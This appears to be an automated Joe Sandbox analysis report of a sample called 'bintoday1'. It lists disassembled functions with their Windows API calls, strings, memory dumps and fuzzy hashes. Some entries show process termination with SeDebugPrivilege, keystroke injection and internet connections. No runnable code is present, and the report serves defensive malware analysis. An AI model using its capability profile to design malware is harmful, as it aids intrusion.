Opcode ID: 1209a7967468472eceec881a31b3d8a499592ed7aa11f97529c1aac9721693e3
Instruction ID: d90c5dcbf8bce6b719d9cd50d5f1047db19553893667c4c96048ae6e4c13d228
Opcode Fuzzy Hash: 1209a7967468472eceec881a31b3d8a499592ed7aa11f97529c1aac9721693e3
Instruction Fuzzy Hash: 5E217E3184421EABCF11AF90CC46FFE77B5FF28701F0444AAF915620A2EB719658DB60

Function 00BF209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00BF20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00BF20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BF214D

Strings

list, xrefs: 00BF212F
details, xrefs: 00BF20FB
smallicons, xrefs: 00BF2115
largeicons, xrefs: 00BF20E1
SHELLDLL_DefView, xrefs: 00BF20CC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 697d90bc6f2119587f6c4c9c788cc401a6ebaf62ed3f50dfaec1475048634d12
Instruction ID: 207518184cc83db979ebe9cc46f9c321de40645fc8f00286be95d42bf170770a
Opcode Fuzzy Hash: 697d90bc6f2119587f6c4c9c788cc401a6ebaf62ed3f50dfaec1475048634d12
Instruction Fuzzy Hash: D111EB7A58470ABAFA116320DC1BDFA77DCDB05315B2001A5FB04B60D2EBA1994E551D

Function 00BCCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00BCCEB7
_free.LIBCMT ref: 00BCCF22
_free.LIBCMT ref: 00BCCF48
_free.LIBCMT ref: 00BCCF71
_free.LIBCMT ref: 00BCCFA9
_free.LIBCMT ref: 00BCCFDA
_free.LIBCMT ref: 00BCD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00BCD09C
_free.LIBCMT ref: 00BCD0B5

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 399c6e35e9bc3503eb831641e5c012b12a7fc6850dcc70ff87f829060e239646
Instruction ID: db3ada028faad74cb58fce526c1ab2c50472d4644dc846f63fe2b3ecfe5539ca
Opcode Fuzzy Hash: 399c6e35e9bc3503eb831641e5c012b12a7fc6850dcc70ff87f829060e239646
Instruction Fuzzy Hash: 6E610371904201AFDB21AFB89891F6E7FE9EF15320F1442FDF949E7282D6719D058790

Function 00C250D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C25186
ShowWindow.USER32(?,00000000), ref: 00C251C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 00C251CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00C251D1

Part of subcall function 00C26FBA: DeleteObject.GDI32(00000000), ref: 00C26FE6

GetWindowLongW.USER32(?,000000F0), ref: 00C2520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C2521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C2524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C25287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C25296

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: c2fe540b264bfc64bed729f952825d5c78e9c272be5c8dcefda35e635e1f3288
Instruction ID: 8beb03c7ee3430086f6895430aea6ce6ad063c1a0b6b70890d15bc408febe1bf
Opcode Fuzzy Hash: c2fe540b264bfc64bed729f952825d5c78e9c272be5c8dcefda35e635e1f3288
Instruction Fuzzy Hash: 0451C530A50A28FFEF309F25EC49BDE3B65FB05321F144011F62596AE0C775AA94DB50

Function 00BA8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00BE6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00BE68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BE68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00BE68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BE68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BA8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BE6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BE691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BA8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BE692D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 0f583e1a7e6af8e30d14c9ee1976055d036ba83201ed7b33dd8616850a248e93
Instruction ID: 635b7964eee6fb3d1a1396ca647334baf21add00fccc52701ce3ef23110386bc
Opcode Fuzzy Hash: 0f583e1a7e6af8e30d14c9ee1976055d036ba83201ed7b33dd8616850a248e93
Instruction Fuzzy Hash: D751B770600209EFDB20CF25CC85BAE3BF5FB58360F140168F902976A0DB71E990DB60

Function 00C0C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C0C182
GetLastError.KERNEL32 ref: 00C0C195
SetEvent.KERNEL32(?), ref: 00C0C1A9

Part of subcall function 00C0C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C0C272
Part of subcall function 00C0C253: GetLastError.KERNEL32 ref: 00C0C322
Part of subcall function 00C0C253: SetEvent.KERNEL32(?), ref: 00C0C336
Part of subcall function 00C0C253: InternetCloseHandle.WININET(00000000), ref: 00C0C341

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: bcfe865b19227dc15c94583e07be3d7e916f8d6bc6a6208396c80bc5352a0d0b
Instruction ID: ad03fe18a71e64b293ce8a890baaa028a265af47b5585b00e3749e6182607fce
Opcode Fuzzy Hash: bcfe865b19227dc15c94583e07be3d7e916f8d6bc6a6208396c80bc5352a0d0b
Instruction Fuzzy Hash: 78318E71600601EFDB259FE5DD84B6ABBF8FF18300B00461DF96682A60DB30E915EBA0

Function 00BF25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BF3A57
Part of subcall function 00BF3A3D: GetCurrentThreadId.KERNEL32 ref: 00BF3A5E
Part of subcall function 00BF3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BF25B3), ref: 00BF3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 00BF25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BF25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00BF25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00BF25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BF2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00BF2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 00BF260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BF2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00BF2627

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 02d15912ce309c829b469a609407797c6aab4e6beeb8529d63eff9a3c1fdb995
Instruction ID: 67bd7bd4099d3cd62a5af29084a09837980a73e1faf8601a7f2568fc52e893c6
Opcode Fuzzy Hash: 02d15912ce309c829b469a609407797c6aab4e6beeb8529d63eff9a3c1fdb995
Instruction Fuzzy Hash: A901D4303A0614BBFB2067699CCAF6D3F99DF4EB12F100001F328AF0D1C9E224598A69

Function 00BF1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00BF1449,?,?,00000000), ref: 00BF180C
HeapAlloc.KERNEL32(00000000,?,00BF1449,?,?,00000000), ref: 00BF1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BF1449,?,?,00000000), ref: 00BF1828
GetCurrentProcess.KERNEL32(?,00000000,?,00BF1449,?,?,00000000), ref: 00BF1830
DuplicateHandle.KERNEL32(00000000,?,00BF1449,?,?,00000000), ref: 00BF1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BF1449,?,?,00000000), ref: 00BF1843
GetCurrentProcess.KERNEL32(00BF1449,00000000,?,00BF1449,?,?,00000000), ref: 00BF184B
DuplicateHandle.KERNEL32(00000000,?,00BF1449,?,?,00000000), ref: 00BF184E
CreateThread.KERNEL32(00000000,00000000,00BF1874,00000000,00000000,00000000), ref: 00BF1868

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 04cd81023571ed22cb5cf925e1c8c92c753b46270a0b892101f313a89c1d2901
Instruction ID: 818289c5270633378a90656c8afbbde70ee7a888ea4e345c45445708170cb84c
Opcode Fuzzy Hash: 04cd81023571ed22cb5cf925e1c8c92c753b46270a0b892101f313a89c1d2901
Instruction Fuzzy Hash: 9D01BBB5650308BFE720ABA5DC8EF6F3BACEB89B11F104411FA05DB5A1CA709815CB60

Function 00C1A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00BFD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00BFD501
Part of subcall function 00BFD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00BFD50F
Part of subcall function 00BFD4DC: CloseHandle.KERNEL32(00000000), ref: 00BFD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C1A16D
GetLastError.KERNEL32 ref: 00C1A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C1A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C1A268
GetLastError.KERNEL32(00000000), ref: 00C1A273
CloseHandle.KERNEL32(00000000), ref: 00C1A2C4

Strings

SeDebugPrivilege, xrefs: 00C1A18F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 0e24c0b1f14938286b7ae4de81059cf1ef75010601b2ad3055b249c270a4b6eb
Instruction ID: f2294380728399f555aeead87866364e009ad502954e43394c50578b6e734c5c
Opcode Fuzzy Hash: 0e24c0b1f14938286b7ae4de81059cf1ef75010601b2ad3055b249c270a4b6eb
Instruction Fuzzy Hash: 3061C431205241AFD720DF18C494F69BBE1AF45318F54849CE46A8BBA3C772ED89DB92

Function 00C23886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C23925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C2393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C23954
_wcslen.LIBCMT ref: 00C23999
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C239C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C239F4

Strings

SysListView32, xrefs: 00C238F7

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 4ebe5d05ec445a12f6e37428ea97cfc0ac7524ed46a0f6180d2eea688ff6fc07
Instruction ID: 1581467f7fd6e6796b61dea3beafa1c33b9b364c8b81a40329f04aa2c5c1854e
Opcode Fuzzy Hash: 4ebe5d05ec445a12f6e37428ea97cfc0ac7524ed46a0f6180d2eea688ff6fc07
Instruction Fuzzy Hash: 1A41C571A00228ABDF21DF64DC45BEE7BA9EF08350F100526F954E7681D7759A84CB90

Function 00BFBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BFBCFD
IsMenu.USER32(00000000), ref: 00BFBD1D
CreatePopupMenu.USER32 ref: 00BFBD53
GetMenuItemCount.USER32(00FB4CC8), ref: 00BFBDA4
InsertMenuItemW.USER32(00FB4CC8,?,00000001,00000030), ref: 00BFBDCC

Strings

2, xrefs: 00BFBD37
0, xrefs: 00BFBCA8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 747e4562226f2b4423ceb85d6d6f99987cd819cbd538f64af9a6a8039acecc32
Instruction ID: 335fd69e19f4ef6043416cc2339c938788d9b8efa579f1f0ed92acc6642beb50
Opcode Fuzzy Hash: 747e4562226f2b4423ceb85d6d6f99987cd819cbd538f64af9a6a8039acecc32
Instruction Fuzzy Hash: 75519E74A0020D9BDB20DFA8D8C4FBEBBF4EF45314F1441A9E61197290D7709949CB52

Function 00BFC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00BFC913

Strings

question, xrefs: 00BFC8CC
stop, xrefs: 00BFC8E4
blank, xrefs: 00BFC895
info, xrefs: 00BFC8B4
warning, xrefs: 00BFC8FC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f22bf4c9f0e44ca2ad125f09ceb0220ffa06f62028f912a6729664c29256cc2d
Instruction ID: bad570fa28325e93adddd12b916b46716e6a389ec5f23afe16ae9b92bcf82e9f
Opcode Fuzzy Hash: f22bf4c9f0e44ca2ad125f09ceb0220ffa06f62028f912a6729664c29256cc2d
Instruction Fuzzy Hash: 3D115E3568970EBBE7015710DDC2DFE6BDCDF15355B5040BAF600A7182D7F19E885268

Function 00BED3A2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BED3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BED3BF
FreeLibrary.KERNEL32(00000000), ref: 00BED3E5
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00BED3FC

Strings

GetSystemWow64DirectoryW, xrefs: 00BED3B9
kernel32.dll, xrefs: 00BED3A8
X64, xrefs: 00BED2A8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
API String ID: 582185067-2904798639
Opcode ID: 135f090891cbe544519dcb9196b28e9cd07c6162dc32cea2e03b5f47be10dfe1
Instruction ID: 28e8c76da7a23200bb17a0e5693ea245a9b2748160ccee31302619a8ea4062ce
Opcode Fuzzy Hash: 135f090891cbe544519dcb9196b28e9cd07c6162dc32cea2e03b5f47be10dfe1
Instruction Fuzzy Hash: 2AF027319066659BC3319711CCD9BAD73B4AF00B01F8480D1F602F6040DBB0CD448AA4

Function 00BFED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00BFED2A
_wcslen.LIBCMT ref: 00BFED3B
_wcslen.LIBCMT ref: 00BFED79
_wcslen.LIBCMT ref: 00BFEDAF
_wcslen.LIBCMT ref: 00BFEDDF
_wcslen.LIBCMT ref: 00BFEDEF
_wcslen.LIBCMT ref: 00BFEE2B
_wcslen.LIBCMT ref: 00BFEE5A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: cb7468467b3c35cc5ccee23b256bc2c2608663ec61a05c54da93faa7e60201ac
Instruction ID: 362a83d023ea8ac42cd91a2ff3e991045e16dd2c73dcf460a43768490c316d3a
Opcode Fuzzy Hash: cb7468467b3c35cc5ccee23b256bc2c2608663ec61a05c54da93faa7e60201ac
Instruction Fuzzy Hash: 8841C665C1011877DB11EBF4CC8A9EFB7E8AF45310F5084A6E614E3122FB78D649C3A5

Function 00BAF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00BE682C,00000004,00000000,00000000), ref: 00BAF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00BE682C,00000004,00000000,00000000), ref: 00BEF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00BE682C,00000004,00000000,00000000), ref: 00BEF454

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3f84ed624b434b952ed85a2ce5b0013686ea72dcee736b405bf5757d809d5c1f
Instruction ID: 81d5501a7d940791206112b1c3e712f6e0ee3618830982a87fc61f513fc15110
Opcode Fuzzy Hash: 3f84ed624b434b952ed85a2ce5b0013686ea72dcee736b405bf5757d809d5c1f
Instruction Fuzzy Hash: 7841093160C682BAC7798BAA88C87BF7BE2EF57311F1844BDE04752A60C771E881C751

Function 00C22D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C22D1B
GetDC.USER32(00000000), ref: 00C22D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C22D2E
ReleaseDC.USER32(00000000,00000000), ref: 00C22D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C22D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C22D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C25A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00C22DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C22DE1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 97e0589051d226b4dcf2f45dba77375200521d398bfeced641ee27f20b5b237a
Instruction ID: 69107b4df09cbdb4df01ae39226f3866c284c01d6a9fba1c174e1c237e289a74
Opcode Fuzzy Hash: 97e0589051d226b4dcf2f45dba77375200521d398bfeced641ee27f20b5b237a
